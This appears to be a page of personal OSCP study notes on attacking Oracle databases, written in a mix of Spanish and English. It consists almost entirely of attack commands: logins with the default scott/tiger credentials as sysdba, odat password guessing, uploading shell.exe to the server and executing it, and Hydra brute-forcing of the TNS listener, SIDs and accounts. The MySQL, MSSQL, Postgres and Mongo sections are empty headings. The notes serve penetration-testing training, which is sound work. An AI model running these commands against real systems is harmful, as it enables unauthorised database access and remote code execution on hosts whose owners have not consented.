OSCP Notes logo OSCP Notes

exploiting

databases

ORACLE

clii tool

sqlplus64 scott/tiger@10.10.10.10:1521/XE as sysdba

odat

odat all -s 10.10.10.82 -p 1521 odat passwordguesser –accounts-file /root/tools/SecLists/Passwords/Default-Credentials/oracle-betterdefaultpasslist.txt -s 10.10.10.82 -p 1521 -d XE

upload file with odat odat utlfile -s 10.10.10.82 -U scott -P tigger -d XE –sysdba –putFile c:\windows\temp shell.exe shell.exe

execute file odat externaltable -s 10.10.10.82 -U scott -P tiger -d XE –sysdba –exec c:/ shell.exe

hydra

podemos usar hydra para bruteforcear el passowrd del tnslistener si es que tien ./hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener

tmb para bruteforcear SIDs ./hydra -L /usr/share/oscanner/lib/services.txt -s 1521 host.victim oracle-sid

bruteforcear account ./hydra -L /tmp/user.txt -P /tmp/pass.txt -s 1521 host.victim oracle /PLSEXTPROC

oscanner

oscanner -s 192.168.1.18

sqlplus

para loguearse a una db remota sqlplus /@/;

si tiene sysdba sqlplus /@/ 'as sysdba';

MySQL

MSSQL

Postgres

MONGO